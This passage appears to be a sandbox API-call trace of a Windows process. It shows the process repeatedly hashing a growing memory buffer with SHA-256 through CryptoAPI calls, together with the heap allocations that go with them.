	[0250.409] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.409] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.409] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.409] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0250.409] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2c68
	[0250.409] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2c68, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2c68, pdwDataLen=0x128c3c) returned 1
	[0250.409] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.409] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.409] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.410] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.410] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0250.410] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2c90
	[0250.410] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2c90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2c90, pdwDataLen=0x128c3c) returned 1
	[0250.410] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.410] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.410] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.410] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.410] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0250.410] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2cb8
	[0250.410] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2cb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2cb8, pdwDataLen=0x128c3c) returned 1
	[0250.410] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.410] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.410] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.411] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.411] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0250.411] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ce0
	[0250.411] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2ce0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ce0, pdwDataLen=0x128c3c) returned 1
	[0250.411] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.411] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.411] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.411] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.411] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0250.411] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2d08
	[0250.411] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2d08, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2d08, pdwDataLen=0x128c3c) returned 1
	[0250.411] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.411] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.411] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.412] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.412] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0250.412] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2d30
	[0250.412] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2d30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2d30, pdwDataLen=0x128c3c) returned 1
	[0250.412] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.412] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.412] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.412] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.412] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0250.412] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2d58
	[0250.412] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2d58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2d58, pdwDataLen=0x128c3c) returned 1
	[0250.413] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.413] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.413] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.413] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.413] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0250.413] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.413] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2d80
	[0250.413] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2d80, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2d80, pdwDataLen=0x128c3c) returned 1
	[0250.413] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.413] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.413] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.413] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.413] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0250.414] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2da8
	[0250.414] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2da8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2da8, pdwDataLen=0x128c3c) returned 1
	[0250.414] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.414] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.414] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.414] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.414] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0250.414] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2dd0
	[0250.414] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2dd0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2dd0, pdwDataLen=0x128c3c) returned 1
	[0250.414] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.414] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.414] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.414] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.414] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0250.415] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2df8
	[0250.415] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2df8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2df8, pdwDataLen=0x128c3c) returned 1
	[0250.415] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.415] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.415] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.415] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.415] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0250.415] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2e20
	[0250.415] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2e20, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2e20, pdwDataLen=0x128c3c) returned 1
	[0250.415] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.415] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.415] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.416] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.416] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0250.416] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2e48
	[0250.416] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2e48, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2e48, pdwDataLen=0x128c3c) returned 1
	[0250.416] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.416] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.416] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.416] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.416] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0250.416] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2e70
	[0250.416] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2e70, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2e70, pdwDataLen=0x128c3c) returned 1
	[0250.416] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.416] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.416] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.417] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.417] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0250.417] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2e98
	[0250.417] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2e98, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2e98, pdwDataLen=0x128c3c) returned 1
	[0250.417] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.417] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.417] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.417] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.417] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0250.417] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ec0
	[0250.417] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2ec0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ec0, pdwDataLen=0x128c3c) returned 1
	[0250.417] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.417] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.417] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.418] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.418] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0250.418] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ee8
	[0250.418] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2ee8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ee8, pdwDataLen=0x128c3c) returned 1
	[0250.418] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.418] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.418] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.418] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.418] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0250.418] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f10
	[0250.418] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2f10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2f10, pdwDataLen=0x128c3c) returned 1
	[0250.418] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.418] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.418] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2761c48) returned 1
	[0250.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2761c48
	[0250.418] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.419] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.419] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0250.419] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f38
	[0250.419] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2f38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2f38, pdwDataLen=0x128c3c) returned 1
	[0250.419] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.419] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.419] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.419] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.419] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0250.419] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f60
	[0250.419] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2f60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2f60, pdwDataLen=0x128c3c) returned 1
	[0250.419] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.419] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.419] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.420] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.420] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0250.420] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f88
	[0250.420] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2f88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2f88, pdwDataLen=0x128c3c) returned 1
	[0250.420] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.420] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.420] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.420] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.420] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0250.420] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2fb0
	[0250.420] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2fb0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2fb0, pdwDataLen=0x128c3c) returned 1
	[0250.420] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.420] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.420] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.421] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.421] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0250.421] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2fd8
	[0250.421] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2fd8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2fd8, pdwDataLen=0x128c3c) returned 1
	[0250.421] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.421] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.421] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.421] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.421] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0250.421] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3000
	[0250.421] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3000, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3000, pdwDataLen=0x128c3c) returned 1
	[0250.421] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.421] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.421] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.422] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.422] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0250.422] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3028
